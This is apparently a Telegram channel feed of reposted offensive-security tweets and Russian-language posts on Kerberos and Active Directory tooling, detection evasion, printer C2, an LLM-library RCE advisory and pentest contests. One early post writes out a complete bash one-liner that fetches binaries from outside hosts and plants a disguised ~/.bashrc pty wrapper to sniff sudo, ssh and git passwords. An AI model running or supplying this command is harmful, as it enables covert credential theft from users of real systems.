😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/noscript" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
🔥15😢1
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
I integrated some Rust artifacts directly into CS 😱
Here's the blog post demonstrating how you can make your own.
🔗 https://rastamouse.me/custom-beacon-artifacts/
🐥 [ tweet ][ quote ]
[BLOG]
I integrated some Rust artifacts directly into CS 😱
Here's the blog post demonstrating how you can make your own.
🔗 https://rastamouse.me/custom-beacon-artifacts/
🐥 [ tweet ][ quote ]
🔥6👍1🥱1
Forwarded from Young Researchers Reward Program
Наши друзья из Positive Technologies предоставили нам 6 проходок на PhD для проведения благотворительного конкурса. Читаем инфу ниже!
Вы пишете обезличенный отчет, в котором рассказываете о своей самой интересной баге, отправляете отчет в бота. Позже команда жюри оценит его, а уже 17 мая мы свяжемся с участниками и отдадим их заслуженные призы).
Жюри выберет топ 6 участников для полноценной или частичной компенсации билетов на PositiveHackDays и обратно!
1. Являться школьником/студентом бакалавриата или специалитета
2. Отправить файл формата
.docx или .pdf с описанием бага в нашего бота (В описании к файлу должно содежаться слово Заявка)6го мая в 15:00 - Старт приема заявок
13 мая 15:00 - Закрытие приема заявок
17 мая 17:00 Оглашение результатов
1. Подробность описания (3 балла)
2. Сложность эксплуатации (2 балла)
3. Нестандартный подход и креативность (3 балла)
4. Вау-эффект (субъективный параметр на усмотрение членов жюри) (2 балла)
@SidneyJob (Пентестер, автор канала Заметочки SidneyJob)
@curiv (Пентестер, активист ИБ сообщества, основатель @dc7342, @permctf, автор канала @pathsecure)
@cyrus_0x00 (Пентестер в компании DeteAct
@brotherok (Багхантер, автора канала ШКИБыть)
@bughunter_circuit (Автор канала о багхантинге)
@romanpnn (Автор канала Пакет Безопасности)
@wr3dmast3r (Пентестер, автор канала wr3dmast3r vs pentest)
@r00t_owl (Директор департамента противодействия киберугрозам, автор канала PRO:PENTEST)
<конечный список жюри уточняется>
Бюджет на оплату дороги для всех участников - 120 тысяч. Мы тратим весь планируемый бюджет, в том числе, в счет компенсации оплаты дороги другим победителям.
📃 Что будет с отчетами?
Планируется опубликовать отчеты победителей (при согласии автора)
👉 Важная деталь: Жюри и бюджет формируется независимыми инициативными участниками русскоязычного ИБ сообщества. Конкурс следует воспринимать как благотворительность в отношении перспективных молодых талантов. Мы убеждены, что за такими специалистами находится будущее ИБ сообщества.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Positive Technologies
Уже более 20 лет наша основная задача — предотвращать хакерские атаки до того, как они причинят неприемлемый ущерб бизнесу и целым странам.
Регистрация в перечне РКН: https://knd.gov.ru/license?id=673b47eab7aeb106ceff4f97®istryType=bloggersPermission
Регистрация в перечне РКН: https://knd.gov.ru/license?id=673b47eab7aeb106ceff4f97®istryType=bloggersPermission
👍6🥱2🔥1
😈 [ Synacktiv @Synacktiv ]
In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.
🔗 https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
🐥 [ tweet ]
In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.
🔗 https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
🐥 [ tweet ]
🔥6🤔1
😈 [ Oddvar Moe @Oddvarmoe ]
Created a noscript using ADExplorersnapshot for dumping interesting information from AD into text files. Info such as active server accounts, sccm, printers, laps passwords, asreproast, plaintext password attributes +++
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/43
Decided to go with
🐥 [ tweet ]
Created a noscript using ADExplorersnapshot for dumping interesting information from AD into text files. Info such as active server accounts, sccm, printers, laps passwords, asreproast, plaintext password attributes +++
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/43
Decided to go with
|| as a separator on the out files. Should be easy to parse with cut -d "|"🐥 [ tweet ]
👍7
🔥6👍4
В отпуске зашел спокойно поиграть в компуктер, но, будучи шизом, не справился и в итоге играл не в игрульку, а с Cheat Engine, ведь гейм-читеры круче редтимеров. Спойлер: эта заметка не для чит-мейкеров, а для людей, которые первый раз открыли Cheat Engine и наугад тыкают кнопки в его интерфейсе (таких, как я):
🔗 https://snovvcrash.rocks/2024/05/10/newbies-game-hacking-notes.html
🔗 https://snovvcrash.rocks/2024/05/10/newbies-game-hacking-notes.html
snovvcrash@gh-pages:~$ _
Newbie’s Game Hacking Notes (ft. Turbo Overkill)
A terse-comments blog of making myself more comfortable with Cheat Engine and the basics of cheats/trainers developement. Practice is based on the awesome Turbo Overkill FPS (v1.35).
👍8🔥5😁4🥱3
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
I built a .NET web app to help test and analyse Kerberos delegation configurations.
🔗 https://rastamouse.me/kerberos-delegation-test-app/
🐥 [ tweet ]
[BLOG]
I built a .NET web app to help test and analyse Kerberos delegation configurations.
🔗 https://rastamouse.me/kerberos-delegation-test-app/
🐥 [ tweet ]
👍3
😈 [ Matt Creel @Tw1sm ]
Was inspired by @vendetce to dig into Kerberos TGT renewal with Impacket this morning. Short example noscript in a PR here to do just that ⤵️
🔗 https://github.com/fortra/impacket/pull/1744
🐥 [ tweet ]
Was inspired by @vendetce to dig into Kerberos TGT renewal with Impacket this morning. Short example noscript in a PR here to do just that ⤵️
🔗 https://github.com/fortra/impacket/pull/1744
🐥 [ tweet ]
🔥3
Теперь я понимаю, почему Маска так хейтят за реформы в Твиттере на X - 100$ и 5000$ в месяц за Basic и Pro подписки соответственно на Twitter API v2 это просто абсурд (на бесплатном тарифе, если что, можно только постить твиты и смотреть информацию о собственном профиле). Скажем, если бы автор некоего сферического бота в тг, завязанного на Твиттер апи, уже давно использовал ликнутые на GH токены, то при аннулировании очередного из них новый искать стало бы все более и более проблематично, потому что люди начинают следить более ответственно за подпиской ценой в 💯 бачей.
К счастью, функциональность API для получения информации в красивом json-е о том или ином твите на удивление легко эмулируется средствами веб-тестировки, например, с помощью playwright 😉
К счастью, функциональность API для получения информации в красивом json-е о том или ином твите на удивление легко эмулируется средствами веб-тестировки, например, с помощью playwright 😉
🔥6😁4👍2🥱1
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ pfiatde @pfiatde ]
As ntlm leaking is still a thing, made a showcase for elevating via ldap relaying with some little tricks.
Relaying is done with a Win Client without admin privs and an active Windows firewall (default config), by using HTTP.SYS and SSH.
Details here:
🔗 https://badoption.eu/blog/2024/04/25/netntlm.html
🐥 [ tweet ]
As ntlm leaking is still a thing, made a showcase for elevating via ldap relaying with some little tricks.
Relaying is done with a Win Client without admin privs and an active Windows firewall (default config), by using HTTP.SYS and SSH.
Details here:
🔗 https://badoption.eu/blog/2024/04/25/netntlm.html
🐥 [ tweet ]
👍2🔥2
Ежегодная независимая премия для пентестеров — Pentest award возвращается!
Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.
В этот раз вас ждут 6 номинаций, по три призовых места в каждой:
— Пробив WEB🆕
— Пробив инфраструктуры🆕
— Девайс🆕
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка
Главный приз — тяжеленная стеклянная именная статуэтка за первое место (у меня вот такая уже имеется). Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.
Я в этом году участвовать не планировал, а всем остальным пожелаю удачи!
Сбор заявок уже открыт на сайте:
🔗 https://award.awillix.ru/
#pentestaward
Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.
В этот раз вас ждут 6 номинаций, по три призовых места в каждой:
— Пробив WEB
— Пробив инфраструктуры
— Девайс
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка
Главный приз — тяжеленная стеклянная именная статуэтка за первое место (у меня вот такая уже имеется). Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.
Я в этом году участвовать не планировал, а всем остальным пожелаю удачи!
Сбор заявок уже открыт на сайте:
🔗 https://award.awillix.ru/
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍4🥱3
😈 [ LLM Security @llm_sec ]
Remote Code Execution by Server-Side Template Injection in Model Metadata
CVSS 9.7 in llama_cpp_python
found by @retr0reg
🔗 https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829
🐥 [ tweet ]
Remote Code Execution by Server-Side Template Injection in Model Metadata
CVSS 9.7 in llama_cpp_python
found by @retr0reg
🔗 https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829
🐥 [ tweet ]
🔥3👍1
😈 [ Nicolas Krassas @Dinosn ]
PoC for using MS Windows printers for persistence / command and control via Internet Printing
🔗 https://github.com/Diverto/IPPrintC2
🐥 [ tweet ]
PoC for using MS Windows printers for persistence / command and control via Internet Printing
🔗 https://github.com/Diverto/IPPrintC2
🐥 [ tweet ]
🔥6👍2
😈 [ CravateRouge @rouge_cravate ]
Performing kerberos cross domain authentication with impacket is not straightforward!
If you want to authenticate on domain A (trusting domain B) with a userB you must ask a ST to domain B for krbtgt/domainA and then use this ST to request new ST to domainA, e.g.:
🐥 [ tweet ]
Performing kerberos cross domain authentication with impacket is not straightforward!
If you want to authenticate on domain A (trusting domain B) with a userB you must ask a ST to domain B for krbtgt/domainA and then use this ST to request new ST to domainA, e.g.:
🐥 [ tweet ]
Б for Баян🔥5
😈 [ sinusoid @the_bit_diddler ]
I'm intending to release an open-source Visual Studio Code extension to make writing BOFs easier for the community:
- Complete Nt/Zw function prototypes with tab completion (and correct typecasting for placeholder variables)
- MSDN header searching
PoC:
🔗 https://www.youtube.com/watch?v=oWss4Ac9Pl8
🐥 [ tweet ]
I'm intending to release an open-source Visual Studio Code extension to make writing BOFs easier for the community:
- Complete Nt/Zw function prototypes with tab completion (and correct typecasting for placeholder variables)
- MSDN header searching
PoC:
🔗 https://www.youtube.com/watch?v=oWss4Ac9Pl8
🐥 [ tweet ]
🔥3
😈 [ Steve S. @0xTriboulet ]
@vxunderground
BSides Talk on Writing malware in Nim w/o the Nim Runtime
🔗 https://github.com/m4ul3r/writing_nimless/blob/main/Writing%20Nimless%20nim.pdf
🐥 [ tweet ]
@vxunderground
BSides Talk on Writing malware in Nim w/o the Nim Runtime
🔗 https://github.com/m4ul3r/writing_nimless/blob/main/Writing%20Nimless%20nim.pdf
🐥 [ tweet ]
🤯3🔥2🤔1
😈 [ CravateRouge @rouge_cravate ]
Having an AD with trusts you can reach?
bloodyAD can now retrieve the trusts of the trusts where you can connect to and print them as a nice ascii tree
🐥 [ tweet ]
Having an AD with trusts you can reach?
bloodyAD can now retrieve the trusts of the trusts where you can connect to and print them as a nice ascii tree
🐥 [ tweet ]
🔥8